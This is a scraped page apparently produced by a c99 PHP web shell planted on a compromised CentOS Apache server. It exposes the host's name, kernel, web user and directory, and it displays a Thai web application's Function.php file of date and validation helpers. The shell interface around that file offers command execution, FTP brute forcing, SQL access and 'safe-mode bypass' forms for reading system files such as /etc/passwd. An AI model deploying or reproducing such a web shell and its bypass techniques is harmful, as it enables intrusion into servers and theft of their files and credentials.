!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/includes/   drwxr-xr-x
Free 52.39 GB of 127.8 GB (40.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Function.php (3.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Function ทาง Date,Mate
$ThaiMonth = array("มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
$ThaiSubMonth = array("ม.ค","ก.พ","มี.ค","ม.ย","พ.ค","มิ.ย","ก.ค","ส.ค","ก.ย","ต.ค","พ.ย","ธ.ค");
$Degree = array("ปริญญาตรี","ปริญญาโท","ปริญญาเอก");
///////////////////////////////////   Display  Thai Day    ///////////////////////////////////
function getThaiMonth()
{
 global $ThaiMonth;
 for($i=0;$i<=11;$i++)
	{
            $a = $i+1;
	    if( $a == 1)
               echo"\n\t<option value=\"$a\" selected>$ThaiMonth[$i]</option>\n ";
             else
		echo"\n\t<option value=\"$a\">$ThaiMonth[$i]</option>\n ";
	   }
}
/////////////////////////////////////////////////////////////////////////////////
function getThaiSubMonth($a)
{
 global $ThaiSubMonth;
         $a  = $a -1;
 for($i=0;$i<=11;$i++)
	{
            if( $a == $i )
              return $a = $ThaiSubMonth[$i];
	 }
}


/////////////////////////////  Display  Thai Month ////////////////////////////////////////////////////////////////////////
function getDay1to31()
{
 for($i=1;$i<=31;$i++)
	{  
            if( $i == 1)
               echo"\n\t<option value=\"$i\" selected>$i</option>\n ";
             else
		echo"\n\t<option value=\"$i\">$i</option>\n ";
	   }
}
///////////////////   Display  Thai  Year ////////////////////////////////////////////////////////////////////
function get2Year()
{
 $today = getdate();
 $year = $today[year];
 for($x=$year-50;$x<=2010;$x++)
	{
           $z = $x+547;
	   if( $x == ($year+10))
              echo"\n\t<option value=\"$x\" selected>$z</option>\n ";
             else
		echo"\n\t<option value=\"$x\">$z</option>\n "; 
           }
}
///////////////////   Display    Year ////////////////////////////////////////////////////////////////////
function getYear($year)
{
  	   return $year = ($year + 543);  
}
///////////////////////////// Display Degree 
function getThaiDegree()
{
 global $ThaiMonth;
 for($i=0;$i<=2;$i++)
	{
            $a = $i+1;
	    if( $a == 1)
               echo"\n\t<option value=\"$a\" selected>$Degree[$i]</option>\n ";
             else
		echo"\n\t<option value=\"$a\">$Degree[$i]</option>\n ";
	   }
}
//////////////////////////////////////////
function TxtThaiMonth($a)
{
 global $ThaiMonth;
         $a  = $a -1;
 for($i=0;$i<=11;$i++)
	{
            if( $a == $i )
              return $a = $ThaiMonth[$i];
	 }
}
//////////////////* ฟังก์ชั่นตรวจสอบความยาวของสตริง เช่น CheckLenght( $mPassword, 6 ) */
function CheckLenght( $txt , $width )
	{
		if ( strlen( $txt ) >= $width )
			return true;
		return false;
	}
//////////////////////////////* ฟังก์ชั่นตรวจสอบรูปแบบของ Email Address */
function validEmail ( $email ) 
	{ 
	if ( ! eregi( "^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+([\.][a-z0-9-]+)+$", $email ) )
			return false;
	return true;
	}
////////////////* ฟังก์ชั่นตรวจสอบข้อมูลที่นำเข้าว่า เป็นตัวอักษรภาษาอังกฤษ กับ ตัวเลขหรือไม่ */
function CheckEngNumAlpha ( $txt ) 
	{
		if ( ! ereg( "[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890]", $txt ) )
		return true;
	}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--